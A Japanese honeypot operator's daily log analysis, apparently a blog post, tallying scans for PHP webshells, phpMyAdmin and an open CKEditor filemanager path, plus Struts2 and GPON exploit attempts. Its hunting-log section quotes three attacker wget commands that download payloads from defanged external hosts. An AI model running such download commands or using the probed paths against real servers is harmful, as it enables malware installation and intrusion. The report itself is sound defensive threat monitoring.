ハニーポットのログ分析(2018/11/11)
WOWhoneypotの2018/11/11(日) (運用158日目)の簡易分析です。
本日の総アクセス件数は 199件です。
主なアクセスは以下です。
・phpのWebShell設置の調査:82件
・phpMyAdminの調査:60件
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:4件
・GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃(User-Agent: Hello, World):1件
・(新規)「GET /builder/」
→このようなディレクトリがあるか調査しているものと思われます。存在する場合、ツールによって作ったサイトのパーツ等が残っている可能性があるかと思われます。
GET /builder/ HTTP/1.1
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Connection: close
・(新規)オープンディレクトリの調査
→このパスで調べた際、今までの調査の中で一番肝が冷えました…。
CkEditerのプラグインのパスと思われますが、検索してみるとオープンディレクトリが山程みつかります。
隠そうかとも思いましたが、zgrabというスキャナーを使ってスキャンが行われている現状では既に問題かと思い、情報を出しておこうと思います。
GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfm HTTP/1.1
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。Struts2のものが多いです。
1 2018-11-11 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 2018-11-11 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 2018-11-11 wget -c hxxp://103.55.13[.]68:13333/sshk
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 35 | 2018-11-11 | アクセス | GET / |
| 4 | 2018-11-11 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 3 | 2018-11-11 | phpのWebShell設置の調査 | POST /qq.php |
| 2 | 2018-11-11 | phpのWebShell設置の調査 | POST /xx.php |
| 2 | 2018-11-11 | phpのWebShell設置の調査 | POST /q.php |
| 2 | 2018-11-11 | phpMyAdminの調査 | GET /www/phpMyAdmin/index.php |
| 2 | 2018-11-11 | phpMyAdminの調査 | GET /tools/phpMyAdmin/index.php |
| 2 | 2018-11-11 | phpのWebShell設置の調査 | GET /shell.php |
| 2 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin/phpMyAdmin/index.php |
| 2 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin/index.php |
| 2 | 2018-11-11 | phpMyAdminの調査 | GET /claroline/phpMyAdmin/index.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /zuoshou.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /zuo.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /yumo.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /yao.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /xw.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /xw1.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /xshell.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /xiao.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /wuwu11.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /wshell.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /w.php |
| 1 | 2018-11-11 | WordPressの調査 | POST /wp-admins.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /webslee.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /wc.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /wan.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /wanan.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /ssaa.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /s.php |
| 1 | 2018-11-11 | NMAPによるスキャン | POST /sdk |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /qwe.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /qaq.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /phpStudy.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /pe.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /mz.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /mx.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /m.php?pbid=open |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /min.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /lindex.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /l8.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /l7.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /l6.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /infoo.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /hm.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /hh.php |
| 1 | 2018-11-11 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?images/ |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /feixiang.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /defect.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /db.init.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /db__.init.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /db_dataml.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /cmd.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /cainiao.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /bak.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /aw.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /aotu.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /ak.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /ak48.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /ak47.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /9678.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | POST /56.php |
| 1 | 2018-11-11 | 調査 | HEAD / |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /z.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /x.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /xampp/phpmyadmin/index.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /wp-config.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /web/phpMyAdmin/index.php |
| 1 | 2018-11-11 | WebDAVの調査 | GET /webdav/ |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /uploader.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /typo3/phpmyadmin/index.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /text.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /test.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /scripts/setup.php |
| 1 | 2018-11-11 | クローリング | GET /robots.txt |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /_query.php |
| 1 | 2018-11-11 | プロビジョニング環境の調査 | GET /provisioning |
| 1 | 2018-11-11 | プロビジョニング環境の調査 | GET /provision |
| 1 | 2018-11-11 | プロビジョニング環境の調査 | GET /prov |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /pmd_online.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /pmamy/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /pmamy2/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /PMA/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /pma/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /PMA2/index.php |
| 1 | 2018-11-11 | PHPWetherMapの調査 | GET /plugins/weathermap/editor.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmion/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/db___.init.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadmin/scripts/db___.init.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadmin/phpmyadmin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdminold/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin.old/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadmin-old/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin+++---/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin__/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadmin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyadmin_bak/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin-4.4.0/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadmin2/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadmin1/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdmin123/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadmin0/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyadmi/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAdm1n/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpmyadm1n/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpMyAbmin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /phpma/index.php |
| 1 | 2018-11-11 | NMAPによるスキャン | GET /NmapUpperCheck1541885469 |
| 1 | 2018-11-11 | NMAPによるスキャン | GET /nmaplowercheck1541885469 |
| 1 | 2018-11-11 | NMAPによるスキャン | GET /Nmap/folder/check1541885469 |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /mysql/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /mysqladmin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /mysql-admin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /mysql_admin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /MyAdmin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /myadmin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /myadmin2/index.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /muhstiks.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /muhstik.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /muhstik2.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /lol.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /log.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /logon.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /lala.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /lala-dpr.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /knal.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /java.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /index.php |
| 1 | 2018-11-11 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /htdocs.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /help-e.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /hell.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /desktop.ini.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /db_pma.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /db/index.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /cmx.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /cmv.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /cmd.php |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /cmdd.php |
| 1 | 2018-11-11 | opendirの調査 | GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfm |
| 1 | 2018-11-11 | PHPWetherMapの調査 | GET /cacti/plugins/weathermap/editor.php |
| 1 | 2018-11-11 | サイトの調査 | GET /builder/ |
| 1 | 2018-11-11 | phpのWebShell設置の調査 | GET /appserv.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /admin/PMA/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /admin/pma/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /admin/phpmyadmin/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /admin/phpmyadmin2/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /admin/mysql/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /admin/mysql2/index.php |
| 1 | 2018-11-11 | phpMyAdminの調査 | GET /admin/index.php |
| 1 | 2018-11-11 | 不正中継の調査 | CONNECT www.baidu.com:443 |
以上です。
